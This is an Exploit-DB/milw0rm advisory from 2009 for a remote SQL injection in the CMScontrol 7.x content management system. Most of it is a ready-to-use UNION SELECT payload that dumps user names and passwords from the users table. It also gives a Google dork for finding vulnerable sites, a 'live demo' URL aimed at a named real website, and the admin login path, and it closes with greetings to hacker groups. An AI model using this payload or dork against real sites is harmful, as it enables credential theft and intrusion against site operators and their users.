CMScontrol (Content Management Portal Solutions) - SQL Injection

EDB-ID:

9727




Platform:

Multiple

Date:

2009-09-21


#=Info=======================================================================#
# Software: CMScontrol (Content Management Portal Solutions)  Sql Injection  #
# Version: 7.*                                                               #
# Vulnerability: Remote Sql Injection                                        #
# Google Dork: "index.php?id_menu=" CMScontrol                               # 
# Off. site: www.cmscontrol.com                                              #
#============================================================================#


#=Author==============================================#
# Author: ph1l1ster                                   #  
# Date: 20.09.2009                                    #
# Contact: icq: 612672 | email: ph1l1st3r@gmail.com   #
#=====================================================#


#=Sql Injection===========================================================================================================================================================#
# Exploit: http://site/index.php?id_menu=82+and+1=0+union+select+unhex(hex(1)),unhex(hex(concat_ws(0x3a,user,password))),unhex(hex(3))+from+users--                #
# Live demo: http://www.galsi.it/index.php?id_menu=99999+and+1=0+union+select+unhex(hex(1)),unhex(hex(concat_ws(0x3a,user,password))),unhex(hex(3))+from+users--   #
# Login page: http://site/admin/login.php                                                                                                                          #
#==================================================================================================================================================================#




#=Greetz================================#
# mr.gr33n aka mr.Br0wn, easy-, Micr0b  #
# 0wners Team and all milw0rm team      #
# CW.WS and all CW team                 #
# All Russian and other h4x0r5          #
#=======================================#

# milw0rm.com [2009-09-21]